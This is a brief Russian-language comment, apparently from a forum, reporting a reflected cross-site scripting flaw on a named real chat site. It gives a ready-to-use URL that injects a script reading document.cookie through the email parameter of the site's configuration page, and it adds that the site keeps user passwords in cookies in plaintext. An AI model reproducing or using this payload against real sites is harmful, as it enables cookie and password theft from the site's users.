посмотрел.... пасcивная xss : https://chat.kg/configure.jsp?email=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E причем пароль в куках в открытом виде